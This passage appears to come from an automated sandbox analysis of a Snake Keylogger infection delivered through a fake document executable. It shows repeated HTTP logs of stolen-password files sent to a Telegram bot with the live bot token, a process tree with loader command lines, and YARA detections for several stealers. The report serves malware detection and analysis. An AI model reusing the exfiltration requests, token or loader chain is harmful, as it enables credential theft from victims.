2024-12-18 15:18:41 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418994,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535121,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 50081 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:41 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2480fc2e3ffd
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:41 UTC | 535 | OUT | Data Ascii: --------------------------8dd2480fc2e3ffdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:42 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:42 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:42 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418996,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535122,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 50082 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:41 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2813e0605d29
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:41 UTC | 535 | OUT | Data Ascii: --------------------------8dd2813e0605d29Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:42 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:42 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:42 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418997,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535122,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 50087 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:43 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd24f1d8f190ea
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:43 UTC | 535 | OUT | Data Ascii: --------------------------8dd24f1d8f190eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:43 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:43 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:43 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419000,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535123,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 50089 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:43 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd25151bda7f10
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:43 UTC | 535 | OUT | Data Ascii: --------------------------8dd25151bda7f10Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:44 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:44 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:44 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419002,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535124,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.5 | 50090 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:44 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd28b07a2e3bf6
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:44 UTC | 535 | OUT | Data Ascii: --------------------------8dd28b07a2e3bf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:45 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:44 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:45 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419004,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535124,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.5 | 50094 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:45 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2541c39c92aa
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:45 UTC | 535 | OUT | Data Ascii: --------------------------8dd2541c39c92aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:45 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:45 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:45 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419006,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535125,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.5 | 50096 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:45 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2570877d30d9
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:18:45 UTC | 535 | OUT | Data Ascii: --------------------------8dd2570877d30d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:46 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:46 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:46 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419008,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535126,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 50098 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:46 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2941500303d9
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:46 UTC | 535 | OUT | Data Ascii: --------------------------8dd2941500303d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:47 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:46 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:47 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419010,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535126,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      102192.168.2.550100149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd25d7579be125
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 64 37 35 37 39 62 65 31 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd25d7579be125Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:51 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419012,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535131,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      103 | 192.168.2.5 | 50104 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:51 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd26086a764c20
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:51 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd26086a764c20Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:51 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419014,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535131,"documen


                                                                                                                      Target ID:0
                                                                                                                      Start time:10:16:37
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\D.G Governor Istek,Docx.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2280883342.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2245824423.0000000002366000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2157901937.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:6
                                                                                                                      Start time:10:16:55
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:false
